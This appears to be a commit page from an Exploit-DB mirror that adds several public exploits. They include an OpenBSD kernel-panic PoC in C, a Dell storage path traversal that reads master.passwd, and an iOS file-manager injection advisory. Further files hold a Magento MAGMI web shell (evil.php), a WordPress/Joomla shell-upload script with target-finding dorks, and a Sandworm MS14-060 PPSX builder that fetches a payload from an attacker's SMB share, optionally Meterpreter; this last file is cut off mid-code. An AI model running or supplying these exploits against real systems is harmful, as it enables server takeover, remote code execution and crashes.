bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 10_27_2014

Browse source
This commit is contained in:
Offensive Security 2014-10-27 04:48:25 +00:00
parent 72d8ed3f5c
commit 2d32c6c0f9
7 changed files with 879 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

6
files.csv
View file

@ -31564,3 +31564,9 @@ id,file,description,date,author,platform,type,port
35049,platforms/asp/webapps/35049.txt,"Techno Dreams FAQ Manager Package 1.0 'faqlist.asp' SQL Injection Vulnerability",2010-12-04,R4dc0re,asp,webapps,0
35050,platforms/php/webapps/35050.txt,"Alguest 1.1 'start' Parameter SQL Injection Vulnerability",2010-12-06,"Aliaksandr Hartsuyeu",php,webapps,0
35051,platforms/windows/remote/35051.txt,"Freefloat FTP Server Directory Traversal Vulnerability",2010-12-06,Pr0T3cT10n,windows,remote,0
35052,platforms/php/webapps/35052.txt,"Magento Server MAGMI Plugin - Remote File Inclusion (RFI)",2014-10-25,"Parvinder Bhasin",php,webapps,0
35055,platforms/windows/remote/35055.py,"Windows OLE - Remote Code Execution ""Sandworm"" Exploit (MS14-060)",2014-10-25,"Mike Czumak",windows,remote,0
35056,platforms/hardware/webapps/35056.txt,"Dell EqualLogic Storage - Remote File Inclusion",2014-10-25,"Mauricio Correa",hardware,webapps,0
35057,platforms/php/webapps/35057.py,"Creative Contact Form (Wordpress 0.9.7 and Joomla 2.0.0) - Shell Upload Vulnerability",2014-10-25,"Claudio Viviani",php,webapps,0
35058,platforms/bsd/dos/35058.c,"OpenBSD <= 5.5 - Local Kernel Panic",2014-10-25,nitr0us,bsd,dos,0
35059,platforms/ios/webapps/35059.txt,"File Manager 4.2.10 iOS - Code Execution Vulnerability",2014-10-25,Vulnerability-Lab,ios,webapps,0

Can't render this file because it is too large.

147
platforms/bsd/dos/35058.c Executable file
View file

@ -0,0 +1,147 @@
/*
* tenochtitlan.c
*
* OpenBSD <= 5.5 Local Kernel Panic
* by Alejandro Hernandez (@nitr0usmx)
*
* Advisory and technical details:
* http://www.ioactive.com/pdfs/IOActive_Advisory_OpenBSD_5_5_Local_Kernel_Panic.pdf
*
* Fix: http://www.openbsd.org/errata55.html#013_kernexec
*
* This PoC works only for i386.
*
* Bug found with Melkor (ELF file format fuzzer)
* https://github.com/IOActive/Melkor_ELF_Fuzzer
*
* Mexico / Oct 2014
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/param.h>
#include <sys/types.h>
#ifndef __OpenBSD__
#error "Not an OpenBSD system !!!1111";
#else
#include <sys/exec_elf.h>
#endif
#ifndef __i386__
#error "Not an i386 system !!!1111";
#endif
// In Aztec mythology, Huitzilopochtli, was a god of war, a sun god,
// the patron of the city of Tenochtitlan, the Capital of the Aztec Empire.
const char pyramid[] =
" _____\n"
" _|[]_|_\n"
" _/_/=|_\\_\\_\n"
" _/_ /==| _\\ _\\_\n"
" _/__ /===|_ _\\ __\\_\n"
" _/_ _ /====| ___\\ __\\_\n"
" _/ __ _/=====|_ ___\\ ___ \\_\n"
" _/ ___ _/======| ____ \\_ __ \\_\n";
struct {
unsigned int idx;
Elf32_Word p_align;
} targets[] = {
{ 6, 0xb16b00b5 }, // ( * )( * )
{ 6, 0xdeadface },
{ 4, 0x00001001 },
{ 0, 0x00000004 }
};
int main(int argc, char **argv)
{
Elf32_Ehdr *hdr;
Elf32_Phdr *pht; // Program Header Table
struct stat statinfo;
char *elfptr;
int fd, r;
if(argc < 2){
fprintf(stderr, "Usage: %s <elf_executable>\n", argv[0]);
exit(-1);
}
if((fd = open(argv[1], O_RDWR)) == -1){
perror("open");
exit(-1);
}
if(fstat(fd, &statinfo) == -1){
perror("stat");
close(fd);
exit(-1);
}
if((elfptr = (char *) mmap(NULL, statinfo.st_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0)) == MAP_FAILED){
perror("mmap");
close(fd);
exit(-1);
}
hdr = (Elf32_Ehdr *) (elfptr);
pht = (Elf32_Phdr *) (elfptr + hdr->e_phoff);
printf("[*] hdr->e_phoff:\t0x%.4x\n", hdr->e_phoff);
printf("[*] hdr->e_phnum:\t0x%.4x\n", hdr->e_phnum);
srand(time(NULL));
r = rand();
if(r % 3 == 0){
#ifdef OpenBSD5_5
pht[targets[0].idx].p_align = targets[0].p_align;
printf("[*] PHT[%d].p_align = 0x%x\n", targets[0].idx, pht[targets[0].idx].p_align);
#else // OpenBSD 5.2 didn't panic with 0xb16b00b5 in the last LOAD's p_align
pht[targets[1].idx].p_align = targets[1].p_align;
printf("[*] PHT[%d].p_align = 0x%x\n", targets[1].idx, pht[targets[1].idx].p_align);
#endif
} else if(r % 3 == 1){
pht[targets[2].idx].p_align = targets[2].p_align;
printf("[*] PHT[%d].p_align = 0x%x\n", targets[2].idx, pht[targets[2].idx].p_align);
} else {
int p;
for(p = 0; p < hdr->e_phnum; p++, pht++)
if(pht->p_type == PT_LOAD){
pht->p_align = targets[3].p_align;
printf("[*] PHT[%d].p_align = 0x%x\n", p, pht->p_align);
}
}
// Synchronize the ELF in memory and the file system
if(msync(elfptr, 0, MS_ASYNC) == -1){
perror("msync");
close(fd);
exit(-1);
}
if(munmap(elfptr, statinfo.st_size) == -1){
perror("munmap");
close(fd);
exit(-1);
}
close(fd);
printf("%s", pyramid);
sleep(1);
system(argv[1]);
// Should never reach this point, however sometimes the OS didn't crash with
// system() until the 2nd execution. Same behavior with execl and execv too.
printf("... try to execute %s manually.\n", argv[1]);
return -1;
}

53
platforms/hardware/webapps/35056.txt Executable file
View file

@ -0,0 +1,53 @@
# Exploit Title: Remote Directory Traversal exploit for Dell EqualLogic 6.0
Storage
# Date: 09/2013
# Exploit Author: Mauricio Pampim Corr?a
# Vendor Homepage: www.dell.com
# Version: 6.0
# Tested on: Equipment Model Dell EqualLogic PS4000
# CVE : CVE-2013-3304
The malicious user sends
GET //../../../../../../../../etc/master.passwd
And the Dell Storage answers
root:[hash] &:/root:/bin/sh
daemon:*:[hash]::0:0:The devil himself:/:/sbin/nologin
operator:*:[hash]::0:0:System &:/usr/guest/operator:/sbin/nologin
bin:*:[hash]::0:0:Binaries Commands and Source:/:/sbin/nologin
sshd:*:[hash]:0:0:SSH pseudo-user:/var/chroot/sshd:/sbin/nologin
uucp:*:[hash]:UNIX-to-UNIX
Copy:/var/spool/uucppublic:/usr/libexec/uucp/uucico
nobody:*:[hash]:Unprivileged user:/nonexistent:/sbin/nologin
grpadmin:[hash]:Group Manager Admin Account:/mgtdb/update:/usr/bin/Cli
authgroup:[hash]:Group Authenication Account:/:/sbin/nologin
More informations in (Br-Portuguese) https://www.xlabs.com.br/blog/?p=50
Could obtain shell with flaw? send me an email telling me how, to
mauricio[at]xlabs.com.br
Thanks

214
platforms/ios/webapps/35059.txt Executable file
View file

@ -0,0 +1,214 @@
Document Title:
===============
File Manager v4.2.10 iOS - Code Execution Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1343
Release Date:
=============
2014-10-21
Vulnerability Laboratory ID (VL-ID):
====================================
1343
Common Vulnerability Scoring System:
====================================
9
Product & Service Introduction:
===============================
Try a file manager thats unmatched in functionality and reliability. It was created to manage your cloud services like GoogleDrive, Dropbox,
Box, OneDrive, Yandex.Disk, and network services like FTP, SFTP, SMB, WebDAV, DLNA, photo galleries and files on your device. Manage all of
your stored data like sub-folders - copy, move, rename or compress to archive your folders and files. It supports all possible archive
formats: Zip, Rar, 7z, tar, gz, bz2. You can protect your folders and files with a password and view photo, video and audio content, as well
as documents. This application will be a great help for everyday tasks. Copy a folder from one cloud service to any other - easy! Quickly move
a folder from an archive to a cloud service - easy! Copy your gallery to a network or cloud service - easy!
(Copy of the Homepage: https://itunes.apple.com/de/app/file-manager-pro-manage-your/id926125881 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research team discovered a code execution vulnerability in the official DevelSoftware LTD - File Manager v4.2.10 iOS mobile application.
Vulnerability Disclosure Timeline:
==================================
2014-10-21: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
DevelSoftware LTD
Product: File Manager - iOS Mobile Web Application (Wifi) 4.2.10
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
Technical Details & Description:
================================
A code execution vulnerability has been discovered in the official DevelSoftware LTD - File Manager v4.2.10 iOS mobile application.
The issue allows an attacker to compromise the application and connected device components by exploitation of a system specific code
execution vulnerability in the wifi interface.
The vulnerability is located in the `Create Folder` input field of the index.html wifi web interface. The function create the path value
without any protection or filter mechanism in the GET method request. Remote attackers are able to manipulate the GET method request by
usage of the `createdir?path=` parameter to compromise the application or device. The execution of the code occurs in the index.html file
next to the name output context of the wifi share file dir listing. The attack vector is located on the application-side of the mobile app
and the request method to inject is GET.
The security risk of the remote code execution web vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 8.8
Exploitation of the remote code execution web vulnerability requires no privileged application user account (passwd default blank) or user interaction.
Successful exploitation of the code execution vulnerability results in mobile application compromise and connected or affected device component compromise.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] Create Folder
Vulnerable Parameter(s):
[+] createdir?path=(name)
Affected Module(s):
[+] Wifi Interface (index.html)
Proof of Concept (PoC):
=======================
The code execution vulnerability can be exploited by attackers in the same local wifi without user interaction or pass code authorization.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
1. Install the mobile app to your local iOS device (iphone or ipad) [https://itunes.apple.com/de/app/file-manager-pro-manage-your/id926125881]
2. Start the app and push in the left corner the wifi transfer button
3. Take another device or computer that allows you to access the wifi file transfer interface (localhost:80)
4. Now, inject own code as payload by usage of the create folder input field
Note: The input field requests the path value directly via GET method request without secure parse or encode
5. The code execution occurs directly after the inject in the index.html file of the web interface
6. Successful reproduce of the security vulnerability!
PoC: index.html (Name) [createdir?path=]
<fieldset class="buttonsFieldset">
<input disabled="" value="Download Files" class="buttons" id="loadFileButton" onclick="loadFileButtonClick()" type="button">
<input value="Upload Files" class="buttons" id="uploadFilesButton" onclick="uploadFilesButtonClick()" type="button">
<input value="Create Folder" class="buttons" id="createFolderButton" onclick="createFolderButtonClick()" type="button">
<input disabled="" value="Rename" class="buttons" id="renameButton" onclick="renameButtonClick()" type="button">
<input disabled="" value="Delete" class="buttons" id="deleteButton" onclick="deleteButtonClick()" type="button">
<input value="Select All" class="buttons" id="selectAllButton" onclick="selectAllButtonClick()" type="button">
<input value="Deselect All" class="buttons" id="unselectAllButton" onclick="unselectAllButtonClick()" type="button">
</fieldset>
<div class="separator"></div>
<div class="fileListTableContainer">
<table class="table" id="fileListTable"><tbody><tr id="fileListTable_-1" class="header">
<td id="fileListTable_-1_0" class="field">Name</td><td id="fileListTable_-1_1" class="field">Ext</td><td id="fileListTable_-1_2" class="field">Size</td></tr>
<tr index="0" id="fileListTable_0" class="row"><td index="0" field="name" id="fileListTable_0_0" class="cell">>-[CODE EXECUTION VULNERABILITY!]></td>
<td index="1" field="ext" id="fileListTable_0_1" class="cell">dir</td><td index="2" field="size" id="fileListTable_0_2" class="cell"></td></tr>
<tr index="1" id="fileListTable_1" class="row"><td index="0" field="name" id="fileListTable_1_0" class="cell">testfolder1</td><td index="1" field="ext"
id="fileListTable_1_1" class="cell">dir</td><td index="2" field="size" id="fileListTable_1_2" class="cell"></td></tr><tr index="2" id="fileListTable_2"
class="row"><td index="0" field="name" id="fileListTable_2_0" class="cell">testfolder2</td><td index="1" field="ext" id="fileListTable_2_1"
class="cell">dir</td><td index="2" field="size" id="fileListTable_2_2" class="cell"></td></tr></tbody></table></div>
--- PoC Session Logs [GET] ---
Status: 200[OK]
GET http://localhost:80/createdir?path=%2F%3E%22%3C-[CODE EXECUTION VULNERABILITY!];%3E Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[43] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:80]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:80/index.html]
Connection[keep-alive]
Response Header:
Connection[Keep-Alive]
Content-Length[43]
Status: 200[OK]
GET http://localhost:80/-[CODE EXECUTION VULNERABILITY]; Load Flags[LOAD_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:80]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:80/index.html]
Connection[keep-alive]
Response Header:
Connection[Close]
Date[Sun, 19 Oct 2014 16:22:46 GMT]
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure restriction and parse of the create folder input field. Encode also the vulnerable name value in the
index.html file to prevent application-side code execution attacks.
Security Risk:
==============
The security risk of the code execution web vulnerability in the path value is estimated as critical. (CVSS 8.8)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

48
platforms/php/webapps/35052.txt Executable file
View file

@ -0,0 +1,48 @@
Exploit found date: 10/24/2014
Security Researcher name: Parvinder Singh Bhasin
Contact info: parvinder.bhasin@gmail.com
twitter: @parvinderb <scorpio>
Currently tested version:
Magento version: Magento CE - 1.8 and newer versions
MAGMI version: v0.7.17a and greater
MAGMI (MAGento Mass Importer) suffers from File inclusion vulnerability (RFI) which allows an attacker to upload essentially any PHP file (without any sanity checks). This PHP file could then be used to skim credit card data, rewrite files, run remote commands, delete files..etc. Essentially, this gives attacker ability to execute remote commands on the vulnerable server.
Even though the plugin is not Magento's own plugin, I feel since Magento's commerce platform is used by many sites for conducting business and that lot of their customers could be using the same plugin, Magento has the responsibility to inform it's paid/unpaid customers of this vulnerability. I would appreciate if my name appears as part of the disclosure.
Steps to reproduce:
1. http://<a magentosite.com>/magmi/web/magmi.php
2. Under upload new plugins:
click on "choose file"
MAGento plugins are basically php file zipped. So create a php shell and zip the file. ex: evil.php ex: zip file: evil_plugin.zip. After the file has been uploaded, it will say: Plugin packaged installed.
evil.php:
<?php
if (isset($_POST['command'])){
echo "<form action='evil.php' method='post'>
<input type='text' name='command' value=''/>
<input type='submit' value='execute'/>
</form>";
if(function_exists('shell_exec')) {
$command=$_POST['command'];
$output = shell_exec("$command");
echo "<pre>$output</pre>";
}
}
else {
echo "<form action='evil.php' method='post'>
<input type='text' name='command' value=''/>
<input type='submit' value='execute'/>
</form>";
}
?>
3. Your malicious evil.php file is extracted now. All you then need to do is just access the evil.php page from:
http://<amagentosite.com>/magmi/plugins/evil.php
At this point you could really have access to the entire system. Download any malware, install rootkits, skim credit card data ..etc.etc.

178
platforms/php/webapps/35057.py Executable file
View file

@ -0,0 +1,178 @@
#!/usr/bin/python
#
# Exploit Name: Wordpress and Joomla Creative Contact Form Shell Upload Vulnerability
# Wordpress plugin version: <= 0.9.7
# Joomla extension version: <= 2.0.0
#
# Vulnerability discovered by Gianni Angelozzi
#
# Exploit written by Claudio Viviani
#
# Dork google wordpress: inurl:inurl:sexy-contact-form
# Dork google joomla : inurl:com_creativecontactform
#
# Tested on BackBox 3.x
#
# http connection
import urllib, urllib2, sys, mimetypes
# Args management
import optparse
# file management
import os, os.path
# Check url
def checkurl(url):
if url[:8] != "https://" and url[:7] != "http://":
print('[X] You must insert http:// or https:// procotol')
sys.exit(1)
else:
return url
# Check if file exists and has readable
def checkfile(file):
if not os.path.isfile(file) and not os.access(file, os.R_OK):
print '[X] '+file+' file is missing or not readable'
sys.exit(1)
else:
return file
# Get file's mimetype
def get_content_type(filename):
return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
# Create multipart header
def create_body_sh3ll_upl04d(payloadname):
getfields = dict()
payloadcontent = open(payloadname).read()
LIMIT = '----------lImIt_of_THE_fIle_eW_$'
CRLF = '\r\n'
L = []
for (key, value) in getfields.items():
L.append('--' + LIMIT)
L.append('Content-Disposition: form-data; name="%s"' % key)
L.append('')
L.append(value)
L.append('--' + LIMIT)
L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('files[]', payloadname))
L.append('Content-Type: %s' % get_content_type(payloadname))
L.append('')
L.append(payloadcontent)
L.append('--' + LIMIT + '--')
L.append('')
body = CRLF.join(L)
return body
banner = """
___ ___ __ __,-,__
| Y .-----.----.--| .-----.----.-----.-----. | ' '__|
|. | | _ | _| _ | _ | _| -__|__ --| | __|
|. / \ |_____|__| |_____| __|__| |_____|_____| |_______|
|: | _______ |__| __ |_|
|::.|:. | | _ .-----.-----.--------| .---.-.
`--- ---' |___| | _ | _ | | | _ |
|. | |_____|_____|__|__|__|__|___._|
|: 1 |
|::.. . |
`-------'
_______ __ __ _______ __ __
| _ .----.-----.---.-| |_|__.--.--.-----. | _ .-----.-----| |_.---.-.----| |_
|. 1___| _| -__| _ | _| | | | -__| |. 1___| _ | | _| _ | __| _|
|. |___|__| |_____|___._|____|__|\___/|_____| |. |___|_____|__|__|____|___._|____|____|
|: 1 | _______ |: 1 |
|::.. . | | _ .-----.----.--------. |::.. . |
`-------' |. 1___| _ | _| | `-------'
|. __) |_____|__| |__|__|__|
|: |
|::.|
`---'
Cr3ative C0nt4ct Form Sh3ll Upl04d
Discovered by:
Gianni Angelozzi
Written by:
Claudio Viviani
http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""
commandList = optparse.OptionParser('usage: %prog -t URL -c CMS-f FILENAME.PHP [--timeout sec]')
commandList.add_option('-t', '--target', action="store",
help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
)
commandList.add_option('-c', '--cms', action="store",
help="Insert CMS Type: wordpress|joomla",
)
commandList.add_option('-f', '--file', action="store",
help="Insert file name, ex: shell.php",
)
commandList.add_option('--timeout', action="store", default=10, type="int",
help="[Timeout Value] - Default 10",
)
options, remainder = commandList.parse_args()
# Check args
if not options.target or not options.file or not options.cms:
print(banner)
commandList.print_help()
sys.exit(1)
payloadname = checkfile(options.file)
host = checkurl(options.target)
timeout = options.timeout
cmstype = options.cms
print(banner)
if options.cms == "wordpress":
url_sexy_upload = host+'/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php'
backdoor_location = host+'/wp-content/plugins/sexy-contact-form/includes/fileupload/files/'
elif options.cms == "joomla":
url_sexy_upload = host+'/components/com_creativecontactform/fileupload/index.php'
backdoor_location = host+'/components/com_creativecontactform/fileupload/files/'
else:
print("[X] -c options require: 'wordpress' or 'joomla'")
sys.exit(1)
content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'
bodyupload = create_body_sh3ll_upl04d(payloadname)
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'content-type': content_type,
'content-length': str(len(bodyupload)) }
try:
req = urllib2.Request(url_sexy_upload, bodyupload, headers)
response = urllib2.urlopen(req)
if "error" in response.read():
print("[X] Upload Failed :(")
else:
print("[!] Shell Uploaded")
print("[!] "+backdoor_location+options.file)
except urllib2.HTTPError as e:
print("[X] Http Error: "+str(e.code))
except urllib2.URLError as e:
print("[X] Connection Error: "+str(e.code))

233
platforms/windows/remote/35055.py Executable file
View file

@ -0,0 +1,233 @@
# !/usr/bin/python
# Windows OLE RCE Exploit MS14-060 (CVE-2014-4114) ? Sandworm
# Author: Mike Czumak (T_v3rn1x) - @SecuritySift
# Written: 10/21/2014
# Tested Platform(s): Windows 7 SP1 (w/ exploit script run on Kali Linux)
# You are free to reuse this code in part or in whole with the exception of commercial applications
# For a demo of this PoC, see http://www.securitysift.com/windows-ole-rce-exploit-ms14-060/
import sys, os
import zipfile
import argparse
import subprocess
from shutil import copyfile
from pptx import Presentation
# Args/Usage
def get_args():
parser = argparse.ArgumentParser( prog="ms14_060.py",
formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50),
epilog= '''This script will build a blank PowerPoint show (ppsx) file to exploit the
OLE Remote Code Execution vulnerability identified as MS14-060 (CVE-2014-4114)
Simply pass filename of resulting PPSX and IP Address of remote machine hosting the
share. You can add content to the PPSX file after it has been created.
The script will also create the INF file and an optional Meterpreter
reverse_tcp executable with the -m switch. Alternatively, you can host your own exectuble payload.
Host the INF and GIF (EXE) in an SMB share called "share".
Note: Requires python-pptx''')
parser.add_argument("filename", help="Name of resulting PPSX exploit file")
parser.add_argument("ip", help="IP Address of Remote machine hosting the share")
parser.add_argument("-m", "--msf", help="Set if you want to create Meterpreter gif executable. Pass port (uses ip arg)")
args = parser.parse_args()
return args
# write file
def write_file(filename, contents):
f = open(filename, "w")
f.write(contents)
f.close()
# build bin
def build_bin(embed, ip, share, file):
bin = "\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1" # ole header
bin = bin + "\x00" * 16
bin = bin + "\x3E\x00\x03\x00\xFE\xFF\x09\x00"
bin = bin + "\x06\x00\x00\x00\x00\x00\x00\x00"
bin = bin + "\x00\x00\x00\x00\x01\x00\x00\x00"
bin = bin + "\x01\x00\x00\x00\x00\x00\x00\x00"
bin = bin + "\x00\x10\x00\x00\x02\x00\x00\x00"
bin = bin + "\x01\x00\x00\x00\xFE\xFF\xFF\xFF"
bin = bin + "\x00\x00\x00\x00\x00\x00\x00\x00"
bin = bin + "\xFF" * 432
bin = bin + "\xFD\xFF\xFF\xFF\xFE\xFF\xFF\xFF"
bin = bin + "\xFE\xFF\xFF\xFF\xFE\xFF\xFF\xFF"
bin = bin + "\xFF" * 496
bin = bin + "\x52\x00\x6F\x00\x6F\x00\x74\x00"
bin = bin + "\x20\x00\x45\x00\x6E\x00\x74\x00"
bin = bin + "\x72\x00\x79\x00\x00\x00\x00\x00"
bin = bin + "\x00" * 40
bin = bin + "\x16\x00\x05\x00\xFF\xFF\xFF\xFF"
bin = bin + "\xFF\xFF\xFF\xFF\x01\x00\x00\x00"
bin = bin + "\x02\x26\x02\x00\x00\x00\x00\x00"
bin = bin + "\xC0\x00\x00\x00\x00\x00\x00\x46"
bin = bin + "\x00" * 12
bin = bin + "\xF0\x75\xFD\x41\x63\xB2\xCF\x01"
bin = bin + "\x03\x00\x00\x00\x40\x00\x00\x00"
bin = bin + "\x00\x00\x00\x00\x01\x00\x4F\x00"
bin = bin + "\x4C\x00\x45\x00\x31\x00\x30\x00"
bin = bin + "\x4E\x00\x61\x00\x74\x00\x69\x00"
bin = bin + "\x76\x00\x65\x00\x00\x00\x00\x00"
bin = bin + "\x00" * 36
bin = bin + "\x1A\x00\x02\x01"
bin = bin + "\xFF" * 12
bin = bin + "\x00" * 40
bin = bin + "\x37"
bin = bin + "\x00" * 75
bin = bin + "\xFF" * 12
bin = bin + "\x00" * 116
bin = bin + "\xFF" * 12
bin = bin + "\x00" * 48
bin = bin + "\xFE"
bin = bin + "\xFF" * 511
bin = bin + "\x33\x00\x00\x00" + embed + "\x00" # 3 EmbeddedStgX.txt
bin = bin + "\x5C\x5C" + ip + "\x5C" + share + "\x5C" + file # \\ip\share\file
bin = bin + "\x00" * 460
return bin
# build ppt/drawings/vmlDrawing1.vml
def build_vml():
xml = '<xml xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:p="urn:schemas-microsoft-com:office:powerpoint" xmlns:oa="urn:schemas-microsoft-com:office:activation">'
xml = xml + '<o:shapelayout v:ext="edit"><o:idmap v:ext="edit" data="1"/></o:shapelayout><v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">'
xml = xml + '<v:stroke joinstyle="miter"/><v:formulas><v:f eqn="if lineDrawn pixelLineWidth 0"/><v:f eqn="sum @0 1 0"/><v:f eqn="sum 0 0 @1"/><v:f eqn="prod @2 1 2"/><v:f eqn="prod @3 21600 pixelWidth"/><v:f eqn="prod @3 21600 pixelHeight"/><v:f eqn="sum @0 0 1"/>'
xml = xml + '<v:f eqn="prod @6 1 2"/><v:f eqn="prod @7 21600 pixelWidth"/><v:f eqn="sum @8 21600 0"/><v:f eqn="prod @7 21600 pixelHeight"/><v:f eqn="sum @10 21600 0"/></v:formulas>'
xml = xml + '<v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/><o:lock v:ext="edit" aspectratio="t"/></v:shapetype><v:shape id="_x0000_s1026" type="#_x0000_t75" style="position:absolute; left:100pt;top:-100pt;width:30pt;height:30pt"><v:imagedata o:relid="rId1" o:title=""/></v:shape><v:shape id="_x0000_s1027" type="#_x0000_t75" style="position:absolute; left:150pt;top:-100pt;width:30pt;height:30pt">'
xml = xml + '<v:imagedata o:relid="rId2" o:title=""/></v:shape></xml>'
return xml
# build ppt/slides/_rels/slide1.xml.rels
def build_xml_rels(ole1, ole2):
xml = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
xml = xml + '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/' + ole1 + '"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/' + ole2 + '"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/vmlDrawing" Target="../drawings/vmlDrawing1.vml"/></Relationships>'
return xml
def build_xml_slide1():
xml = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
xml = xml + '<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main"><p:cSld><p:spTree><p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="0" cy="0"/><a:chOff x="0" y="0"/><a:chExt cx="0" cy="0"/></a:xfrm></p:grpSpPr><p:graphicFrame><p:nvGraphicFramePr><p:cNvPr id="4" name="Object 3"/><p:cNvGraphicFramePr><a:graphicFrameLocks noChangeAspect="1"/></p:cNvGraphicFramePr><p:nvPr/></p:nvGraphicFramePr><p:xfrm><a:off x="1270000" y="-1270000"/><a:ext cx="381000" cy="381000"/></p:xfrm><a:graphic><a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole"><p:oleObj spid="_x0000_s1026" name="Packager Shell Object" r:id="rId3" imgW="850320" imgH="686880" progId=""><p:embed/></p:oleObj></a:graphicData></a:graphic></p:graphicFrame><p:graphicFrame><p:nvGraphicFramePr><p:cNvPr id="5" name="Object 4"/><p:cNvGraphicFramePr><a:graphicFrameLocks noChangeAspect="1"/></p:cNvGraphicFramePr><p:nvPr/></p:nvGraphicFramePr><p:xfrm><a:off x="1905000" y="-1270000"/><a:ext cx="381000" cy="381000"/></p:xfrm><a:graphic><a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole"><p:oleObj spid="_x0000_s1027" name="Packager Shell Object" r:id="rId4" imgW="850320" imgH="686880" 